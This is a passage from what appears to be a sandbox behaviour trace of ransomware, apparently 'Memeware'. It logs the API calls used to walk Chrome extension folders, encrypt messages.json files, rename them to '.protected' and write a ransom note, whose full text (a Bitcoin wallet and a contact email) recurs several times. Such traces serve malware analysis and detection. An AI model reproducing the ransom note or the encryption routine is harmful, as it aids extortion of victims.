Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.911] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.911] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.912] lstrlenA (lpString="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") returned 684 [0083.912] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0083.912] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.912] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.912] CloseHandle (hObject=0x164) returned 1 [0083.912] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.912] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0083.912] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0083.912] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0083.912] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0083.912] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0083.912] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR") returned 153 [0083.912] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0083.912] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0083.912] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\*") returned 155 [0083.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0083.912] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.912] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.912] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.912] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.912] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.912] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\.") returned 155 [0083.912] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.912] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.912] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.912] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.912] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.912] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.912] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.913] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\..") returned 156 [0083.913] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.913] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.913] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.913] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.913] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.913] 
lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.913] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.913] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.913] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json") returned 167 [0083.913] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.913] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.913] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.913] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json") returned 167 [0083.913] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json") returned 167 [0083.913] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json") returned 167 [0083.913] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.913] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.924] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.924] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.924] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.924] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.925] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.925] CloseHandle (hObject=0x168) returned 1 [0083.925] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.protected") returned 177 [0083.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0083.925] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.926] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.926] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 171 [0083.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.926] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.926] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.927] lstrlenA (lpString="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") returned 684 [0083.927] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.927] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.927] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.927] CloseHandle (hObject=0x164) returned 1 [0083.927] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.927] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0083.927] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0083.927] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0083.927] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0083.927] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0083.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT") returned 153 [0083.927] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0083.927] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0083.927] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\*") returned 155 [0083.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.927] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.927] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.927] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.927] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.928] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\.") returned 155 [0083.928] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.928] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.928] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.928] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.928] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.928] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.928] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\..") returned 156 [0083.928] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.928] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.928] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.928] lstrcmpiW (lpString1="messages.json", 
lpString2="Windows") returned -1 [0083.928] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.928] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.928] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.928] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json") returned 167 [0083.928] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.928] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.928] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.928] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json") returned 167 [0083.929] 
StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json") returned 167 [0083.929] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json") returned 167 [0083.929] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.929] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.930] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.930] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.931] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.931] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.931] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.931] CloseHandle (hObject=0x168) returned 1 [0083.931] wnsprintfW (in: 
pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.protected") returned 177 [0083.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0083.932] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.932] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.932] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 171 [0083.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.932] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.932] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.933] lstrlenA 
